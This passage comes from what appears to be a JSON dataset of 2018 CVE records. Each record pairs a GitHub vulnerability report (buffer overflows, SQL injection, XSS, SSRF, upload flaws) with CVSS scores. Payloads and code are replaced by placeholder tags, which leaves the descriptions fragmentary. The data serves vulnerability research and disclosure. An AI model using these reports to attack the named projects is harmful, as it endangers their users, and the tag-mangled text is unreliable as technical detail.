        "Issue_Created_At": "2018-07-19T09:38:23Z",
        "description": "\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: URLTAG Cookie: APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"upload\"; APITAG Content Type: image/jpeg APITAG APITAG APITAG APITAG APITAG APITAG cmd APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14443",
        "Issue_Url_old": "https://github.com/ArchimedesCAD/libredwg/issues/6",
        "Issue_Url_new": "https://github.com/archimedescad/libredwg/issues/6",
        "Repo_new": "archimedescad/libredwg",
        "Issue_Created_At": "2018-07-19T12:19:58Z",
        "description": "invail pointer deference in libredwg. libredwg(crash) github address APITAG compile the test case in the source APITAG test with poc APITAG the gdb output ERRORTAG As you can see, the APITAG is now a illegal pointer , and we got crash Program received signal SIGSEGV, Segmentation fault. By using asan , I found this is an heap overflow vulnerability the binary and the poc: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14445",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/289",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/289",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-18T02:17:33Z",
        "description": "ddos in APITAG When open a crafted APITAG file, The program could enter APITAG , and it could hang on, then program could be not response CODETAG The poc APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14446",
        "Issue_Url_old": "https://github.com/TechSmith/mp4v2/issues/20",
        "Issue_Url_new": "https://github.com/techsmith/mp4v2/issues/20",
        "Repo_new": "techsmith/mp4v2",
        "Issue_Created_At": "2018-07-18T02:56:44Z",
        "description": "heap overflow in APITAG When open a crafted APITAG file, The program could tigger heap overflow , this could overwrite vtable ptr . and then enter APITAG ,and use the vtable , then program crash. The gdb output is blow: ERRORTAG As you can see , program crash in APITAG now $rc NUMBERTAG deadbeef , which is our control. fuzz log ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14447",
        "Issue_Url_old": "https://github.com/martinh/libconfuse/issues/109",
        "Issue_Url_new": "https://github.com/libconfuse/libconfuse/issues/109",
        "Repo_new": "libconfuse/libconfuse",
        "Issue_Created_At": "2018-07-18T08:48:53Z",
        "description": "out of bound read in trim_whitespace. When open a crafted file, The program could tigger out of bound read ERRORTAG As you can see APITAG point a APITAG size malloc chunk (which size for user is APITAG ), and APITAG is APITAG then APITAG could access NUMBERTAG byte out of the vaild memory. the poc file APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14448",
        "Issue_Url_old": "https://github.com/ponchio/untrunc/issues/131",
        "Issue_Url_new": "https://github.com/ponchio/untrunc/issues/131",
        "Repo_new": "ponchio/untrunc",
        "Issue_Created_At": "2018-07-19T00:20:04Z",
        "description": "null pointer reference in libav. When open a crafted APITAG file, The program could be Segmentation fault ERRORTAG Now let see in gdb ERRORTAG Crash at APITAG , the asm code are as below APITAG and APITAG , so null pointer reference The vulnerability is in track.cpp CODETAG From the debug session , I find that the following line tigger the vulnerability APITAG stsd obj is a null pointer , let's see in APITAG ERRORTAG The function could return NULL , but APITAG don't consider it. To fix it , may be only need to check the APITAG 's return value The poc file ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14471",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/32",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/32",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2018-07-20T14:22:14Z",
        "description": "null point dereference in APITAG When open the crafted dwg file , it could tigger null point dereference in APITAG Let's see the gdb output ERRORTAG As you can see , crash in APITAG and null point dereference is NUMBERTAG so null point dereference \u3002 The Vulnerability is that APITAG in APITAG don't check the APITAG . ERRORTAG To fix it, please verify the ctrl >block_headers before use it. The poc file APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14472",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/144",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/144",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-07-20T13:30:12Z",
        "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability. Vulnerability file APITAG CODETAG The APITAG parameter is taken directly into the execution of the get_one function without any filtering.\u00a0 POC APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-14476",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/88",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/88",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-11-23T11:19:21Z",
        "description": "Advisory from Netsparker APITAG NUMBERTAG ulnerability . Hello, While testing the Netsparker web application security scanner we identified a vulnerability in APITAG NUMBERTAG Can you please advise whom shall we contact to disclose the vulnerability details so it can be fixed? Please email me: daniel at netsparker dot com Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14498",
        "Issue_Url_old": "https://github.com/mozilla/mozjpeg/issues/299",
        "Issue_Url_new": "https://github.com/mozilla/mozjpeg/issues/299",
        "Repo_new": "mozilla/mozjpeg",
        "Issue_Created_At": "2018-07-20T04:57:53Z",
        "description": "APITAG heap buffer overflow inside get NUMBERTAG bit_row (rdbmp.c). Our fuzzer detected several buffer overflow errors inside APITAG (lines NUMBERTAG and NUMBERTAG as of NUMBERTAG cba. These can be triggered with APITAG where $POC can be found in this directory URLTAG (files ending with APITAG ). Error messages are like: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14498",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/258",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/258",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2018-07-20T13:44:22Z",
        "description": "APITAG heap buffer overflow inside get NUMBERTAG bit_row (rdbmp.c). APITAG was firstly mentioned in URLTAG and following APITAG suggestion I checked f4b8a5c and found similar issues; note that libjpeg did not trigger several crashes that mozjpeg triggered). It can be triggered with APITAG where $POC can be found in this directory URLTAG (files ending with .bmp). ASAN messages are like: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14499",
        "Issue_Url_old": "https://github.com/hyyyp/HYBBS/issues/1",
        "Issue_Url_new": "https://github.com/hyyyp/hybbs/issues/1",
        "Repo_new": "hyyyp/HYBBS",
        "Issue_Created_At": "2018-07-21T02:15:47Z",
        "description": "Stored XSS was found in the title of the article. Frist I installed the HYBBS and registered an account to test. Click the \"\u53d1\u8868\u65b0\u4e3b\u9898\". FILETAG Then at this page , I input ' APITAG ' at the title of an APITAG like this FILETAG At last, click \"\u53d1\u8868\u201c. Then we can see the XSS has occurred",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14500",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/431",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/431",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-07-19T02:13:47Z",
        "description": "joyplus cms NUMBERTAG PATHTAG requests: GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Cookie: security_level NUMBERTAG APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG X Forwarded For NUMBERTAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14501",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/432",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/432",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-07-19T02:35:22Z",
        "description": "joyplus cms NUMBERTAG has Sql vulnerability. Request POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Referer: FILETAG Cookie: security_level NUMBERTAG APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG X Forwarded For NUMBERTAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Sqlmap: (custom) POST parameter APITAG like NUMBERTAG is vulnerable. Do you want to keep testing the others (if any)? FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14505",
        "Issue_Url_old": "https://github.com/mitmproxy/mitmproxy/issues/3234",
        "Issue_Url_new": "https://github.com/mitmproxy/mitmproxy/issues/3234",
        "Repo_new": "mitmproxy/mitmproxy",
        "Issue_Created_At": "2018-07-01T15:58:07Z",
        "description": "mitmweb isn't protected against DNS rebinding. The mitmweb interface does not seem to include protection against DNS rebinding. This could be exploited by a malicious website to either access the sniffed data or run arbitrary Python scripts on the filesystem by setting the scripts config option. I have hacked together a APITAG FILETAG (nothing really special to be seen though).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14512",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/143",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/143",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-07-20T07:35:18Z",
        "description": "There is a XSS vulnerability. > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC CODETAG Vulnerability trigger point APITAG CODETAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14513",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/145",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/145",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-07-20T15:49:43Z",
        "description": "wuzhicms NUMBERTAG SS vulnerability. > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC APITAG CODETAG vulnerability trigger point APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14514",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/29",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/29",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-07-21T10:20:18Z",
        "description": "iCMS NUMBERTAG SSRF vulnerability GET SHELL. a SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive resource files, detect intranets, or even getshell . via the APITAG attackers use this vulnerability to directly control the web service area. POC Loophole code APITAG Correct HTTP requests APITAG FILE protocol malware request APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14515",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/146",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/146",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-07-22T16:19:30Z",
        "description": "wuzhicms NUMBERTAG sql injection vulnerability. > a sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the APITAG POC code that has loopholes APITAG ERRORTAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14522",
        "Issue_Url_old": "https://github.com/aubio/aubio/issues/188",
        "Issue_Url_new": "https://github.com/aubio/aubio/issues/188",
        "Repo_new": "aubio/aubio",
        "Issue_Created_At": "2018-07-22T11:50:21Z",
        "description": "Another SEGV signal problem found. When I run the program aubionotes. The address sanitizer showed this: ERRORTAG The input file of the program has been displayed at: URLTAG The command line is just ./aubionotes testcase3",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14523",
        "Issue_Url_old": "https://github.com/aubio/aubio/issues/189",
        "Issue_Url_new": "https://github.com/aubio/aubio/issues/189",
        "Repo_new": "aubio/aubio",
        "Issue_Created_At": "2018-07-22T11:52:12Z",
        "description": "A global buffer overflow problem has been detected.. There is a global buffer overflow problem . Here are the details: ERRORTAG The input file has been displayed at : URLTAG The command line is just ./aubionotes testcase2",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14524",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/33",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/33",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2018-07-20T23:26:33Z",
        "description": "double free in dwg_free. When open the crafted dwg file , it could tigger double free in APITAG Let's see the program error output ERRORTAG And the output with asan ERRORTAG According debuging , I found that When open the crafted dwg file , APITAG could call APITAG , in APITAG first, it could call APITAG to free a pointer (for example : APITAG ) CODETAG The backtrace are as below CODETAG And then it could call APITAG again , it could call APITAG to free APITAG again. The backtrace are as below CODETAG The poc file APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14531",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/293",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/293",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-22T08:57:37Z",
        "description": "A heap buffer overflow has occurred when running program mp4info.. A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14532",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/294",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/294",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-22T10:35:10Z",
        "description": "A heap buffer overflow has occurred when running program mp NUMBERTAG hls.. A heap buffer overflow has occurred when running program mp NUMBERTAG hls. ERRORTAG The testing program is mp NUMBERTAG hls. And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14543",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/292",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/292",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-20T09:19:47Z",
        "description": "one null pointer deference bug in in APITAG in APITAG To reproduce: ./mp4dump format json $poc poc: FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG e2b1f bp NUMBERTAG fff NUMBERTAG fa2cb0 sp NUMBERTAG fff NUMBERTAG fa2aa0 T NUMBERTAG e2b1e in APITAG const , unsigned char const , unsigned int, APITAG PATHTAG NUMBERTAG bc7 in APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in APITAG PATHTAG NUMBERTAG ec in APITAG ) const PATHTAG NUMBERTAG f8b6 in APITAG const&) const PATHTAG NUMBERTAG f8b6 in APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in APITAG PATHTAG NUMBERTAG f9e in main PATHTAG NUMBERTAG fc5c6b NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG const , unsigned char const , unsigned int, APITAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14544",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/291",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/291",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-20T03:13:14Z",
        "description": "two null pointer deference in APITAG in when running mp NUMBERTAG ts . POC to trigger the two bugs. FILETAG NUMBERTAG mp NUMBERTAG ts poc1 FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffc NUMBERTAG da NUMBERTAG sp NUMBERTAG ffc NUMBERTAG da5e0 T NUMBERTAG e5f in APITAG const PATHTAG NUMBERTAG e5f in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG in APITAG APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , unsigned int) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fa NUMBERTAG bec NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG mp NUMBERTAG ts poc2 FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffed NUMBERTAG fc NUMBERTAG sp NUMBERTAG ffed NUMBERTAG fb NUMBERTAG T NUMBERTAG e NUMBERTAG in APITAG const PATHTAG NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG b1e in APITAG APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , unsigned int) PATHTAG NUMBERTAG b1e in main PATHTAG NUMBERTAG f3ffb NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG f8 in _start ( PATHTAG )",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14549",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/23",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/23",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2018-07-21T04:54:03Z",
        "description": "SEGV in function wav_write in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG in APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14550",
        "Issue_Url_old": "https://github.com/glennrp/libpng/issues/246",
        "Issue_Url_new": "https://github.com/glennrp/libpng/issues/246",
        "Repo_new": "glennrp/libpng",
        "Issue_Created_At": "2018-07-21T07:08:11Z",
        "description": "stack buffer overflow in png2pnm in function get_token. There is an issue in png2pnm in libpng NUMBERTAG It's a stack buffer overflow in png2pnm in function get_token. To compile png2pnm,those command can be used with Clang NUMBERTAG CODETAG The APITAG in folder APITAG should also be modified before the command APITAG as mention in this comment URLTAG : CODETAG This file URLTAG can cause stack buffer overflow when using this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14551",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1221",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1221",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-20T09:26:25Z",
        "description": "Using uninitialized variable in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description The code in PATHTAG use uninitialized variable. line NUMBERTAG APITAG line NUMBERTAG run into APITAG there have some break condition in the loop. APITAG APITAG line NUMBERTAG APITAG The code use uninitialized variable if break from loop.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14562",
        "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/35",
        "Issue_Url_new": "https://github.com/thunlp/thulac/issues/35",
        "Repo_new": "thunlp/thulac",
        "Issue_Created_At": "2018-07-18T02:02:47Z",
        "description": "SEGV signal occurred when running program thulac. When I try to run thulac and thulac_test program. I found this : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14563",
        "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/37",
        "Issue_Url_new": "https://github.com/thunlp/thulac/issues/37",
        "Repo_new": "thunlp/thulac",
        "Issue_Created_At": "2018-07-18T02:34:19Z",
        "description": "Alloc dealloc mismatch . When I give an empty file to the program train_c, I found this issue: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14565",
        "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/36",
        "Issue_Url_new": "https://github.com/thunlp/thulac/issues/36",
        "Repo_new": "thunlp/thulac",
        "Issue_Created_At": "2018-07-18T02:06:29Z",
        "description": "Buffer overflow occurred during training process. When I try to run program train_c with the command line : APITAG The address sanitizer found a heap buffer overflow issue: ERRORTAG The input file I tried to give to the program train_c contains only APITAG as you suggested in your document.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14572",
        "Issue_Url_old": "https://github.com/PyconUK/ConferenceScheduler-cli/issues/19",
        "Issue_Url_new": "https://github.com/pyconuk/conferencescheduler-cli/issues/19",
        "Repo_new": "pyconuk/conferencescheduler-cli",
        "Issue_Created_At": "2018-07-24T00:52:43Z",
        "description": "import_schedule_definition is vulnerable. CODETAG Hi, there is a vulnerability in import_schedule_definition method in io.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14576",
        "Issue_Url_old": "https://github.com/SunContract/SmartContracts/issues/1",
        "Issue_Url_new": "https://github.com/suncontract/smartcontracts/issues/1",
        "Repo_new": "suncontract/smartcontracts",
        "Issue_Created_At": "2018-07-17T13:43:54Z",
        "description": "Integer overflow in APITAG Hello, I have found an integer overflow in APITAG supply variable could overflow,because of the _amount variable is controlled by us and can eventually cause supply overflow to zero. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14582",
        "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/2",
        "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/2",
        "Repo_new": "bagesoft/bagecms",
        "Issue_Created_At": "2018-07-23T02:17:32Z",
